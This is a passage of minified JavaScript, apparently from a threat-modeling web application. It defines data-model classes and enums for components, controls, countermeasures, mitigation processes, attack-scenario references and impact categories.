yG(t,a=0){return(sc[t[a+0]]+sc[t[a+1]]+sc[t[a+2]]+sc[t[a+3]]+"-"+sc[t[a+4]]+sc[t[a+5]]+"-"+sc[t[a+6]]+sc[t[a+7]]+"-"+sc[t[a+8]]+sc[t[a+9]]+"-"+sc[t[a+10]]+sc[t[a+11]]+sc[t[a+12]]+sc[t[a+13]]+sc[t[a+14]]+sc[t[a+15]]).toLowerCase()}(i)};var Ja=(()=>{return(t=Ja||(Ja={}))[t.Added=1]="Added",t[t.Changed=2]="Changed",t[t.Removed=3]="Removed",Ja;var t})(),Ii=(()=>{return(t=Ii||(Ii={})).ArrowPosition="Arrow Position",t.AssignNumberToAsset="Assign Number To Asset",t.CheckBox="Check Box",t.DevInterfaceName="Device Interface Name",t.DataFlowChangeDirection="Data Flow Change Direction",t.DataFlowDiagramReference="Data Flow Diagram Reference",t.DiagramReference="Diagram Reference",t.ElementName="Element Name",t.FlowType="Flow Type",t.ImpactCategory="Impact Category",t.InterfaceElementSelect="Interface Element Select",t.LineType="Line Type",t.LowMediumHighSelect="Low Medium High Select",t.MyDataSelect="Data Select",t.PhysicalElementSelect="Physical Element Select",t.PortBox="Port Box",t.ProtocolSelect="Protocol Select",t.OpenNotes="Open Notes",t.OpenQuestionnaire="Open Questionnaire",t.StencilType="Stencil Type",t.TextArea="Text Area",t.TextBox="Text Box",t.TextBoxValidator="Text Box Validator",Ii;var t})();class bG{static GetTypeNames(){return Object.keys(Ii).map(a=>Ii[a]).filter(a=>"string"==typeof a)}static GetMappableTypeNames(){return[Ii.CheckBox,Ii.DiagramReference,Ii.LowMediumHighSelect,Ii.MyDataSelect,Ii.PhysicalElementSelect,Ii.StencilType,Ii.TextArea,Ii.TextBox]}}var li=(()=>{return(t=li||(li={}))[t.DeleteElementReferences=0]="DeleteElementReferences",t[t.MoveChildElements=1]="MoveChildElements",t[t.RemovePhysicalElementReference=2]="RemovePhysicalElementReference",t[t.DeleteDataFlow=3]="DeleteDataFlow",t[t.RemoveInterfaceReference=4]="RemoveInterfaceReference",t[t.DeleteAttackScenario=5]="DeleteAttackScenario",t[t.RemoveElementFromAttackScenario=6]="RemoveElementFromAttackScenario",t[t.RemoveElementFromTestCase=7]="RemoveElementFromTestCase",t[t.DeleteContextFlow=8]="DeleteContextFlow",t[t.ResetStencilType=9]="ResetStencilType",t[t.DeleteDFDElement=10]="DeleteDFDElement",t[t.DeleteThreatRule=11]="DeleteThreatRule",t[t.DeleteThreatRuleGroup=12]="DeleteThreatRuleGroup",t[t.DeleteThreatQuestion=13]="DeleteThreatQuestion",t[t.DeleteMyComponentType=14]="DeleteMyComponentType",t[t.DeleteComponent=15]="DeleteComponent",t[t.DeleteThreatCategory=16]="DeleteThreatCategory",t[t.DeleteAttackVector=17]="DeleteAttackVector",t[t.DeleteAttackVectorGroup=18]="DeleteAttackVectorGroup",t[t.RemoveStencilTypeTemplateFromStencilType=19]="RemoveStencilTypeTemplateFromStencilType",t[t.RemoveFromStencilProtocolStack=20]="RemoveFromStencilProtocolStack",t[t.RemoveFromElementProtocolStack=21]="RemoveFromElementProtocolStack",t[t.RemoveThreatCategoryFromAttackVector=22]="RemoveThreatCategoryFromAttackVector",t[t.RemoveThreatCategoryFromThreatRule=23]="RemoveThreatCategoryFromThreatRule",t[t.RemoveThreatCategoryFromAttackScenario=24]="RemoveThreatCategoryFromAttackScenario",t[t.RemoveThreatCategoryFromThreatMnemonic=25]="RemoveThreatCategoryFromThreatMnemonic",t[t.RemoveThreatQuestionFromComponent=26]="RemoveThreatQuestionFromComponent",t[t.RemoveAttackVectorFromControl=27]="RemoveAttackVectorFromControl",t[t.RemoveSystemThreatFromAttackScenario=28]="RemoveSystemThreatFromAttackScenario",t[t.DeleteDiagram=29]="DeleteDiagram",t[t.DeleteStack=30]="DeleteStack",t[t.DeleteMyData=31]="DeleteMyData",t[t.DeleteAssetGroup=32]="DeleteAssetGroup",t[t.DeleteControl=33]="DeleteControl",t[t.DeleteControlGroup=34]="DeleteControlGroup",t[t.DeleteCountermeasure=35]="DeleteCountermeasure",t[t.RemoveElementFromCountermeasure=36]="RemoveElementFromCountermeasure",t[t.RemoveAttackScenarioFromCountermeasure=37]="RemoveAttackScenarioFromCountermeasure",t[t.RemoveAttackScenarioFromAttackScenario=38]="RemoveAttackScenarioFromAttackScenario",t[t.RemoveAttackScenarioFromTestCase=39]="RemoveAttackScenarioFromTestCase",t[t.RemoveCountermeasureFromTestCase=40]="RemoveCountermeasureFromTestCase",t[t.RemoveMitigationProcessFromCountermeasure=41]="RemoveMitigationProcessFromCountermeasure",t[t.DeleteRequirementType=42]="DeleteRequirementType",t[t.RemoveRequirementTypeFromChecklistType=43]="RemoveRequirementTypeFromChecklistType",t[t.RemoveRequirementTypeFromChecklist=44]="RemoveRequirementTypeFromChecklist",t[t.DeleteChecklist=45]="DeleteChecklist",t[t.DeleteTestCase=46]="DeleteTestCase",t[t.RemoveMyTagFromAttackScenario=47]="RemoveMyTagFromAttackScenario",t[t.RemoveMyTagFromCountermeasure=48]="RemoveMyTagFromCountermeasure",t[t.RemoveMyTagFromMyTagChart=49]="RemoveMyTagFromMyTagChart",li;var t})();class MG{static ToString(a,e,i){var n,r,c;return a.Type===li.DeleteElementReferences?i.instant("dialog.delete.DeleteElementReferences")+" "+(null===(r=e.Project.FindDiagramOfElement(null===(n=a.Param)||void 0===n?void 0:n.ID))||void 0===r?void 0:r.Name):i.instant("dialog.delete."+li[a.Type])+" "+(null===(c=a.Param)||void 0===c?void 0:c.Name)}static FindAllReferencesDeep(a,e,i){let n=[];a.FindReferences(e,i).forEach(c=>{n.push(c),li[c.Type].startsWith("Delete")&&n.push(...this.FindAllReferencesDeep(c.Param,e,i))});let r=[];for(let c=1;c<n.length;c++){const d=n.findIndex(T=>T.Type==n[c].Type&&T.Param==n[c].Param);d>=0&&d<c&&r.push(c)}return r.forEach(c=>{n.splice(c,1)}),n}}class Ln{constructor(a){this.properties=[],this.NameChanged=new Tt,this.DataChanged=new Tt,this.Data=a,0==Object.keys(a).length&&(this.Data.ID=Fo(),this.Name="",this.Description=""),this.initProperties()}get ID(){return this.Data.ID}get Name(){return this.Data.Name.replace(/\n/g," ")}set Name(a){this.Data.Name=a,this.NameChanged.emit(a)}get NameRaw(){return this.Data.Name}set NameRaw(a){this.Name=a}get Description(){return this.Data.Description}set Description(a){this.Data.Description=a}GetProperties(){return this.properties}AddProperty(a,e,i,n,r,c,d,T){let k=this.properties.find(Y=>Y.ID==e&&Y.Type==r&&Y.Editable==c);if(k)return k;let q={DisplayName:a,ID:e,Tooltip:i,HasGetter:n,Type:r,Editable:c,Callback:T};return d&&(q.DefaultValue=d),this.properties.push(q),q}GetProperty(a){let e=this.properties.find(i=>i.ID==a);return e?e.HasGetter?this[e.ID]:this.Data[e.ID]:null}SetProperty(a,e){let i=this.properties.find(n=>n.ID==a);!i||(i.HasGetter?this[i.ID]=e:this.Data[i.ID]=e)}CopyFrom(a){const e=this.ID;this.Data=JSON.parse(JSON.stringify(a)),this.Data.ID=e}ToJSON(){return this.Data}initProperties(){this.AddProperty("properties.Name","Name","",!0,Ii.TextBox,!0),this.AddProperty("properties.Description","Description","",!0,Ii.TextArea,!0)}}class Lp extends Ln{constructor(a){super(a),this.OutOfScopeChanged=new Tt,this.Data.UserCheckedElement||(this.Data.UserCheckedElement=!1),this.InitSubsriptions()}get UserCheckedElement(){return this.Data.UserCheckedElement}set UserCheckedElement(a){this.Data.UserCheckedElement=a}get OutOfScope(){return this.Data.OutOfScope}set OutOfScope(a){this.Data.OutOfScope=a,this.OutOfScopeChanged.emit(a)}initProperties(){super.initProperties(),this.GetProperties().find(a=>"Name"==a.ID).Type=Ii.TextArea,this.AddProperty("properties.OutOfScope","OutOfScope","",!0,Ii.CheckBox,!0,!1)}InitSubsriptions(){this.UserCheckedElement||setTimeout(()=>{this.subscription=this.NameChanged.subscribe(()=>{this.UserCheckedElement=!0,this.subscription.unsubscribe()})},1e3)}FindReferences(a,e){let i=[];return null==a||a.GetAttackScenarios().filter(n=>{var r;return n.Target==this||(null===(r=n.Targets)||void 0===r?void 0:r.includes(this))}).forEach(n=>{i.push(n.ThreatRule&&2==n.ThreatRule.RuleGenerationType&&null==n.Target?{Type:li.RemoveElementFromAttackScenario,Param:n}:{Type:li.DeleteAttackScenario,Param:n})}),null==a||a.GetCountermeasures().filter(n=>n.Targets.includes(this)).forEach(n=>i.push({Type:li.RemoveElementFromCountermeasure,Param:n})),null==a||a.GetTestCases().filter(n=>n.LinkedElements.includes(this)).forEach(n=>i.push({Type:li.RemoveElementFromTestCase,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteAttackScenario?a.DeleteAttackScenario(n.Param):n.Type==li.RemoveElementFromAttackScenario?n.Param.Targets=n.Param.Targets.filter(r=>r!=this):n.Type==li.RemoveElementFromCountermeasure?n.Param.RemoveTarget(this.ID):n.Type==li.RemoveCountermeasureFromTestCase&&n.Param.RemoveLinkedElement(this.ID)})}}var zr=(()=>{return(t=zr||(zr={}))[t.None=0]="None",t[t.Software=1]="Software",t[t.Process=2]="Process",zr;var t})();class Kb extends Ln{constructor(a,e){super(a),this.config=e,this.Properties||(this.Properties=[])}get ComponentTypeID(){return this.Data.ComponentTypeID}set ComponentTypeID(a){this.Data.ComponentTypeID=a}get IsActive(){return this.Data.IsActive}set IsActive(a){this.Data.IsActive=a}get IsThirdParty(){return this.Data.IsThirdParty}set IsThirdParty(a){this.Data.IsThirdParty=a}get Properties(){return this.Data.Properties}set Properties(a){this.Data.Properties=a}FindReferences(a,e){let i=[];return e.GetThreatQuestions().filter(n=>n.ComponentType.ID==this.ID).forEach(n=>i.push({Type:li.DeleteThreatQuestion,Param:n})),null==a||a.GetComponents().filter(n=>n.Type.ID==this.ID).forEach(n=>i.push({Type:li.DeleteComponent,Param:n})),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfMyComponent(this);n&&n.RemoveMyComponentType(this),i.forEach(r=>{r.Type==li.DeleteThreatQuestion?e.DeleteThreatQuestion(r.Param):r.Type==li.DeleteComponent&&a.DeleteComponent(r.Param)})}static FromJSON(a,e){return new Kb(a,e)}}class Xb extends Ln{constructor(a,e){super(a),this.config=e,this.Data.myComponentTypeIDs||(this.Data.myComponentTypeIDs=[])}get Types(){let a=[];return this.Data.myComponentTypeIDs.forEach(e=>a.push(this.config.GetMyComponentType(e))),a}get ComponentTypeID(){return this.Data.ComponentTypeID}set ComponentTypeID(a){this.Data.ComponentTypeID=a}AddMyComponentType(a){this.Types.includes(a)||this.Data.myComponentTypeIDs.push(a.ID)}RemoveMyComponentType(a){this.Types.includes(a)&&this.Data.myComponentTypeIDs.splice(this.Data.myComponentTypeIDs.indexOf(a.ID),1)}FindReferences(a,e){let i=[];return this.Types.forEach(n=>i.push({Type:li.DeleteMyComponentType,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteMyComponentType&&e.DeleteMyComponentType(n.Param)})}static FromJSON(a,e){return new Xb(a,e)}}class rf extends Lp{constructor(a,e,i,n){super(a),this.project=i,this.config=n,this.Type||(this.Name=e.Name,this.IsActive=e.IsActive,this.IsThirdParty=e.IsThirdParty,this.Description=e.Description),this.Type=e,this.Data.threatQuestions||(this.Data.threatQuestions={}),this.Data.Notes||(this.Data.Notes=[]),this.Data.notesPerQuestion||(this.Data.notesPerQuestion={}),this.Version||(this.Version=""),this.Port||(this.Port=""),n.GetThreatQuestions().filter(r=>r.ComponentType.ID==e.ID).forEach(r=>this.AddThreatQuestion(r))}get IsActive(){return this.Data.IsActive}set IsActive(a){this.Data.IsActive=a}get IsThirdParty(){return this.Data.IsThirdParty}set IsThirdParty(a){this.Data.IsThirdParty=a}get Type(){return this.config.GetMyComponentType(this.Data.typeID)}set Type(a){this.Data.typeID=a.ID,this.setTypeProperties(a),this.TypeID=a.ComponentTypeID,this.TypeID==zr.Software&&(this.AddProperty("properties.Version","Version","",!0,Ii.TextBox,!0),this.AddProperty("properties.Port","Port","",!0,Ii.PortBox,!0))}get TypeID(){return this.Data.TypeID}set TypeID(a){this.Data.TypeID=a}get ThreatQuestions(){return this.Data.threatQuestions}get Version(){return this.Data.Version}set Version(a){this.Data.Version=a}get Port(){return this.Data.Port}set Port(a){this.Data.Port=a}get Notes(){return this.Data.Notes}set Notes(a){this.Data.Notes=a}get NotesPerQuestion(){return this.Data.notesPerQuestion}set NotesPerQuestion(a){this.Data.notesPerQuestion=a}get SyncNameToTypeName(){return this.Data.SyncNameToTypeName}set SyncNameToTypeName(a){this.Data.SyncNameToTypeName=a}get Name(){return this.Data.Name.replace(/\n/g," ")}set Name(a){this.Data.Name=a,this.SyncNameToTypeName&&(this.Type.Name=a),this.NameChanged.emit(a)}AddThreatQuestion(a){a.ID in this.Data.threatQuestions||(this.Data.threatQuestions[a.ID]=null)}RemoveThreatQuestion(a){this.Data.threatQuestions[a.ID]&&delete this.Data.threatQuestions[a.ID]}FindReferences(a,e){return super.FindReferences(a,e)}OnDelete(a,e){super.OnDelete(a,e);let i=a.GetStacks().find(n=>n.GetChildren().includes(this));i&&i.RemoveChild(this)}static FromJSON(a,e,i){let n=i.GetMyComponentType(a.typeID);return null==n&&(n=i.CreateMyComponentType(i.GetMyComponentTypeGroups(a.TypeID)[0]),n.Name=a.Name=a.Name+" - ERROR - Missing type"),new rf(a,n,e,i)}initProperties(){super.initProperties(),this.AddProperty("properties.IsActive","IsActive","",!0,Ii.CheckBox,!0),this.AddProperty("properties.IsThirdParty","IsThirdParty","",!0,Ii.CheckBox,!0),this.TypeID==zr.Software&&(this.AddProperty("properties.Version","Version","",!0,Ii.TextBox,!0),this.AddProperty("properties.Port","Port","",!0,Ii.PortBox,!0)),this.AddProperty("properties.Questionnaire","","",!1,Ii.OpenQuestionnaire,!0),this.AddProperty("general.Notes","","",!1,Ii.OpenNotes,!0)}setTypeProperties(a){a&&a.Properties&&a.Properties.forEach(e=>{this.AddProperty(null==e.DisplayName?e.ID:e.DisplayName,e.ID,e.Tooltip,e.HasGetter,e.Type,e.Editable),null==this.Data[e.ID]&&(this.Data[e.ID]=e.DefaultValue)})}}class Om extends Ln{constructor(a,e,i){super(a),this.ChildrenChanged=new Tt,this.project=e,this.Data.childrenIDs||(this.Data.childrenIDs=[]),null==this.ComponentTypeID&&this.children.length>0&&(this.ComponentTypeID=this.children[0].Type.ComponentTypeID)}get children(){let a=[];return this.Data.childrenIDs.forEach(e=>a.push(this.project.GetComponent(e))),a}get ComponentTypeID(){return this.Data.ComponentTypeID}set ComponentTypeID(a){this.Data.ComponentTypeID=a}get Root(){return this.project.GetStack(this.Data.rootID)}set Root(a){this.Data.rootID=null==a?void 0:a.ID}AddChild(a){null!=a?this.Data.childrenIDs.includes(a.ID)||(this.Data.childrenIDs.push(a.ID),this.Root?this.Root.ChildrenChanged.emit(!0):this.ChildrenChanged.emit(!0)):console.error("child undefined")}RemoveChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}DeleteChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.project.DeleteComponent(a),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}GetChildren(){return this.children}GetChildrenFlat(){return this.GetChildren()}FindReferences(a,e){let i=[];return this.GetChildren().forEach(n=>i.push({Type:li.DeleteComponent,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteComponent&&a.DeleteComponent(n.Param)})}static FromJSON(a,e,i){return new Om(a,e,i)}}class Fg extends Ln{constructor(a,e){super(a),this.config=e,this.Data.mitigatedAttackVectorIDs||(this.Data.mitigatedAttackVectorIDs=[]),this.Data.mitigatedThreatRuleIDs||(this.Data.mitigatedThreatRuleIDs=[]),this.Data.MitigationTips||(this.Data.MitigationTips=[])}get MitigatedAttackVectors(){let a=[];return this.Data.mitigatedAttackVectorIDs.forEach(e=>a.push(this.config.GetAttackVector(e))),a}set MitigatedAttackVectors(a){this.Data.mitigatedAttackVectorIDs=null==a?void 0:a.map(e=>e.ID)}get MitigatedThreatRules(){let a=[];return this.Data.mitigatedThreatRuleIDs.forEach(e=>a.push(this.config.GetThreatRule(e))),a}set MitigatedThreatRules(a){this.Data.mitigatedThreatRuleIDs=null==a?void 0:a.map(e=>e.ID)}get MitigationTips(){return this.Data.MitigationTips}set MitigationTips(a){this.Data.MitigationTips=a}AddMitigatedAttackVector(a){this.MitigatedAttackVectors.includes(a)||this.Data.mitigatedAttackVectorIDs.push(a.ID)}RemoveMitigatedAttackVector(a){const e=this.MitigatedAttackVectors.indexOf(a);e>=0&&this.Data.mitigatedAttackVectorIDs.splice(e,1)}AddMitigatedThreatRule(a){this.MitigatedThreatRules.includes(a)||this.Data.mitigatedThreatRuleIDs.push(a.ID)}RemoveMitigatedThreatRule(a){const e=this.MitigatedThreatRules.indexOf(a);e>=0&&this.Data.mitigatedThreatRuleIDs.splice(e,1)}FindReferences(a,e){let i=[];return null==a||a.GetCountermeasures().filter(n=>n.Control==this).forEach(n=>i.push({Type:li.DeleteCountermeasure,Param:n})),i}OnDelete(a,e){let i=e.FindGroupOfControl(this);i&&i.RemoveControl(this),this.FindReferences(a,e).forEach(r=>{r.Type==li.DeleteCountermeasure&&a.DeleteCountermeasure(r.Param)})}static FromJSON(a,e){return new Fg(a,e)}}class Yb extends Ln{constructor(a,e){super(a),this.config=e,this.Data.controlGroupIDs||(this.Data.controlGroupIDs=[]),this.Data.controlIDs||(this.Data.controlIDs=[])}get SubGroups(){let a=[];return this.Data.controlGroupIDs.forEach(e=>a.push(this.config.GetControlGroup(e))),a}get Controls(){let a=[];return this.Data.controlIDs.forEach(e=>a.push(this.config.GetControl(e))),a}AddControlGroup(a){this.SubGroups.includes(a)||this.Data.controlGroupIDs.push(a.ID)}RemoveControlGroup(a){this.SubGroups.includes(a)&&this.Data.controlGroupIDs.splice(this.Data.controlGroupIDs.indexOf(a.ID),1)}AddControl(a){this.Controls.includes(a)||this.Data.controlIDs.push(a.ID)}RemoveControl(a){this.Controls.includes(a)&&this.Data.controlIDs.splice(this.Data.controlIDs.indexOf(a.ID),1)}FindReferences(a,e){let i=[];return this.SubGroups.forEach(n=>i.push({Type:li.DeleteControlGroup,Param:n})),this.Controls.forEach(n=>i.push({Type:li.DeleteControl,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteControl?e.DeleteControl(n.Param):n.Type==li.DeleteControlGroup&&e.DeleteControlGroup(n.Param)}),e.FindGroupOfControlGroup(this).RemoveControlGroup(this)}static FromJSON(a,e){return new Yb(a,e)}}var Ra=(()=>{return(t=Ra||(Ra={}))[t.NotSet=1]="NotSet",t[t.NotApplicable=2]="NotApplicable",t[t.Rejected=3]="Rejected",t[t.NeedsInvestigation=4]="NeedsInvestigation",t[t.MitigationStarted=5]="MitigationStarted",t[t.Implemented=6]="Implemented",t[t.Duplicate=7]="Duplicate",Ra;var t})();class al{static GetMitigationStates(){return[Ra.NotSet,Ra.NotApplicable,Ra.Rejected,Ra.NeedsInvestigation,Ra.MitigationStarted,Ra.Implemented,Ra.Duplicate]}static GetDashboardMitigationStates(){return[Ra.NotSet,Ra.NeedsInvestigation,Ra.MitigationStarted,Ra.Implemented]}static ToString(a){switch(a){case Ra.NotSet:return"properties.mitigationstate.NotSet";case Ra.NotApplicable:return"properties.mitigationstate.NotApplicable";case Ra.Rejected:return"properties.mitigationstate.Rejected";case Ra.NeedsInvestigation:return"properties.mitigationstate.NeedsInvestigation";case Ra.MitigationStarted:return"properties.mitigationstate.ImplementationStarted";case Ra.Implemented:return"properties.mitigationstate.Implemented";case Ra.Duplicate:return"properties.mitigationstate.Duplicate";default:return console.error("Missing State in MitigationStateUtil.ToString()",a),"Undefined"}}}class Jl extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.Data.attackScenarioIDs||(this.Data.attackScenarioIDs=[]),this.Data.MitigationState||(this.MitigationState=Ra.NotSet),this.Data.myTagIDs||(this.Data.myTagIDs=[])}get Name(){if(null!=this.Data.Name)return this.Data.Name;let a="";return this.Control&&(a+=this.Control.Name+" for "),this.Targets&&(a+=this.Targets.filter(e=>e).map(e=>e.GetProperty("Name")).join(", ")),a}set Name(a){this.Data.Name=a,this.NameChanged.emit(this.Name)}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get ViewID(){return this.Data.ViewID}set ViewID(a){this.Data.ViewID=a}get MappingState(){return this.Data.MappingState}set MappingState(a){this.Data.MappingState=a}get MitigationState(){return this.Data.MitigationState}set MitigationState(a){this.Data.MitigationState=Number(a)}get IsGenerated(){return this.Data.IsGenerated}set IsGenerated(a){this.Data.IsGenerated=a}get RuleStillApplies(){return this.Data.RuleStillApplies}set RuleStillApplies(a){this.Data.RuleStillApplies=a}get Control(){return this.config.GetControl(this.Data.controlID)}set Control(a){this.Data.controlID=null==a?void 0:a.ID}get Targets(){let a=[];return this.Data.targetIDs.forEach(e=>{let i=this.project.GetDFDElement(e);if(i)a.push(i);else{let n=this.project.GetComponent(e);if(n)a.push(n);else{let r=this.project.GetContextElement(e);a.push(r||null)}}}),a}set Targets(a){this.Data.targetIDs=a.map(e=>e.ID)}get AttackScenarios(){let a=[];return this.Data.attackScenarioIDs.forEach(e=>a.push(this.project.GetAttackScenario(e))),a}set AttackScenarios(a){this.Data.attackScenarioIDs=null==a?void 0:a.map(e=>e.ID)}get MitigationProcess(){return this.project.GetMitigationProcess(this.Data.mitigationProcessID)}set MitigationProcess(a){this.Data.mitigationProcessID=null==a?void 0:a.ID}get AttackVectors(){var a;return null===(a=this.AttackScenarios)||void 0===a?void 0:a.map(e=>null==e?void 0:e.AttackVector).filter(e=>e).filter((e,i,n)=>n.indexOf(e)===i)}get MyTags(){let a=[];return this.Data.myTagIDs.forEach(e=>a.push(this.project.GetMyTag(e))),a}set MyTags(a){this.Data.myTagIDs=null==a?void 0:a.map(e=>e.ID)}SetMapping(a,e,i){this.MappingState=zn.New,this.Control=a,this.Targets=e,this.AttackScenarios=i,this.Name=null,this.RuleStillApplies=!0}AddAttackScenario(a){this.AttackScenarios.includes(a)||this.Data.attackScenarioIDs.push(a.ID)}RemoveAttackScenario(a){const e=this.Data.attackScenarioIDs.indexOf(a);e>=0&&this.Data.attackScenarioIDs.splice(e,1)}AddTarget(a){this.Targets.includes(a)||this.Data.targetIDs.push(a.ID)}RemoveTarget(a){const e=this.Data.targetIDs.indexOf(a);e>=0&&this.Data.targetIDs.splice(e,1)}AddMyTag(a){this.MyTags.includes(a)||this.Data.myTagIDs.push(a.ID)}RemoveMyTag(a){const e=this.Data.myTagIDs.indexOf(a);e>=0&&this.Data.myTagIDs.splice(e,1)}GetDiagram(){return this.project.GetView(this.ViewID)}GetTestCases(){return this.project.GetTestCases().filter(a=>a.LinkedMeasures.includes(this))}CheckUniqueNumber(){return this.project.GetCountermeasures().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){var a;return"CM"+Gi.EmptyIfNull(this.Number)+") "+this.Name+" ("+(null===(a=this.Targets)||void 0===a?void 0:a.map(e=>e.Name).join(", "))+")"}CleanUpReferences(){let a=this.AttackScenarios;for(let i=a.length-1;i>=0;i--)null==a[i]&&this.Data.attackScenarioIDs.splice(i,1);let e=this.Targets;for(let i=e.length-1;i>=0;i--)null==e[i]&&this.Data.targetIDs.splice(i,1)}FindReferences(a,e){let i=[];return null==a||a.GetTestCases().filter(n=>n.LinkedMeasures.includes(this)).forEach(n=>i.push({Type:li.RemoveCountermeasureFromTestCase,Param:n})),i}OnDelete(a,e){this.MappingState=zn.Removed,this.FindReferences(a,e).forEach(n=>{n.Type==li.RemoveCountermeasureFromTestCase&&n.Param.RemoveLinkedCountermeasure(this.ID)})}static FromJSON(a,e,i){return new Jl(a,e,i)}}var kl=(()=>{return(t=kl||(kl={}))[t.NotStarted=1]="NotStarted",t[t.WorkInProgress=2]="WorkInProgress",t[t.Completed=3]="Completed",kl;var t})();class C2{static GetMitigationStates(){return[kl.NotStarted,kl.WorkInProgress,kl.Completed]}static ToString(a){switch(a){case kl.NotStarted:return"properties.mitigationprocessstate.NotStarted";case kl.WorkInProgress:return"properties.mitigationprocessstate.WorkInProgress";case kl.Completed:return"properties.mitigationprocessstate.Completed";default:return console.error("Missing State in MitigationProcessStateUtil.ToString()",a),"Undefined"}}}class zp extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.MitigationProcessState||(this.MitigationProcessState=kl.NotStarted),null==this.Progress&&(this.Progress=0),this.Data.Tasks||(this.Data.Tasks=[]),this.Data.Notes||(this.Data.Notes=[])}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get Progress(){return this.Data.Progress}set Progress(a){this.Data.Progress=a}get Tasks(){return this.Data.Tasks}set Tasks(a){this.Data.Tasks=a}get Notes(){return this.Data.Notes}set Notes(a){this.Data.Notes=a}get MitigationProcessState(){return this.Data.MitigationProcessState}set MitigationProcessState(a){this.Data.MitigationProcessState=a}get Countermeasures(){return this.project.GetCountermeasures().filter(a=>a.MitigationProcess==this)}set Countermeasures(a){this.Countermeasures.filter(e=>!a.includes(e)).forEach(e=>e.MitigationProcess=null),a.forEach(e=>e.MitigationProcess=this)}CheckUniqueNumber(){return this.project.GetMitigationProcesses().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){return"MP"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(a,e){let i=[];return this.Countermeasures.forEach(n=>i.push({Type:li.RemoveMitigationProcessFromCountermeasure,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.RemoveMitigationProcessFromCountermeasure&&(n.Param.MitigationProcess=null)})}static FromJSON(a,e,i){return new zp(a,e,i)}}var so=(()=>{return(t=so||(so={}))[t.Confidentiality=1]="Confidentiality",t[t.Integrity=2]="Integrity",t[t.Availability=3]="Availability",t[t.Authorization=4]="Authorization",t[t.Authenticity=5]="Authenticity",t[t.NonRepudiation=6]="NonRepudiation",t[t.Auditability=7]="Auditability",t[t.Trustworthiness=8]="Trustworthiness",t[t.Safety=9]="Safety",t[t.Privacy=10]="Privacy",t[t.Compliance=11]="Compliance",t[t.Financial=12]="Financial",t[t.Reputation=13]="Reputation",t[t.CustomerSatisfaction=14]="CustomerSatisfaction",t[t.ProductionProcess=15]="ProductionProcess",so;var t})();class Vs{static GetKeys(){return[so.Confidentiality,so.Integrity,so.Availability,so.Authorization,so.Authenticity,so.NonRepudiation,so.Auditability,so.Trustworthiness,so.Safety,so.Privacy,so.Compliance,so.Financial,so.Reputation,so.CustomerSatisfaction,so.ProductionProcess]}static ToString(a){switch(a){case so.Confidentiality:return"impactcategory.Confidentiality";case so.Integrity:return"impactcategory.Integrity";case so.Availability:return"impactcategory.Availability";case so.Authorization:return"impactcategory.Authorization";case so.Authenticity:return"impactcategory.Authenticity";case so.NonRepudiation:return"impactcategory.NonRepudiation";case so.Auditability:return"impactcategory.Auditability";case so.Trustworthiness:return"impactcategory.Trustworthiness";case so.Safety:return"impactcategory.Safety";case so.Privacy:return"impactcategory.Privacy";case so.Compliance:return"impactcategory.Compliance";case so.Financial:return"impactcategory.Financial";case so.Reputation:return"impactcategory.Reputation";case so.CustomerSatisfaction:return"impactcategory.CustomerSatisfaction";case so.ProductionProcess:return"impactcategory.ProductionProcess";default:return console.error("Missing Cat in ImpactCategoryUtil.ToString()",a),"Undefined"}}}class Jb extends Ln{get ImpactCats(){return this.Data.ImpactCats}constructor(a,e){super(a),this.ImpactCats||(this.Data.ImpactCats=[])}FindReferences(a,e){let i=[];return e.GetAttackVectors().filter(n=>{var r;return null===(r=n.ThreatCategories)||void 0===r?void 0:r.includes(this)}).forEach(n=>{i.push({Type:li.RemoveThreatCategoryFromAttackVector,Param:n})}),e.GetThreatRules().filter(n=>{var r;return null===(r=n.ThreatCategories)||void 0===r?void 0:r.includes(this)}).forEach(n=>{i.push({Type:li.RemoveThreatCategoryFromThreatRule,Param:n})}),e.GetStencilThreatMnemonics().filter(n=>n.Letters.some(r=>r.threatCategoryID==this.ID)).forEach(n=>{i.push({Type:li.RemoveThreatCategoryFromThreatMnemonic,Param:n})}),null==a||a.GetAttackScenarios().filter(n=>{var r;return null===(r=n.ThreatCategories)||void 0===r?void 0:r.includes(this)}).forEach(n=>{i.push({Type:li.RemoveThreatCategoryFromAttackScenario,Param:n})}),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfThreatCategory(this);n&&n.RemoveThreatCategory(this),i.forEach(r=>{if(r.Type==li.RemoveThreatCategoryFromAttackScenario){let c=r.Param.Mapping.Threat.ThreatCategoryIDs;c.splice(c.indexOf(r.Param.ID),1)}else if(r.Type==li.RemoveThreatCategoryFromAttackVector){let c=r.Param.Data.threatCategorieIDs;c.splice(c.indexOf(r.Param.ID),1)}else if(r.Type==li.RemoveThreatCategoryFromThreatRule){let c=r.Param.Mapping.ThreatCategoryIDs;c.splice(c.indexOf(r.Param.ID),1)}else r.Type==li.RemoveThreatCategoryFromThreatMnemonic&&r.Param.Letters.forEach(c=>{c.threatCategoryID==this.ID&&(c.threatCategoryID=null)})})}static FromJSON(a,e){return new Jb(a,e)}}class Zb extends Ln{constructor(a,e){super(a),this.config=e,this.Data.threatCategorieIDs||(this.Data.threatCategorieIDs=[])}get ThreatCategories(){let a=[];return 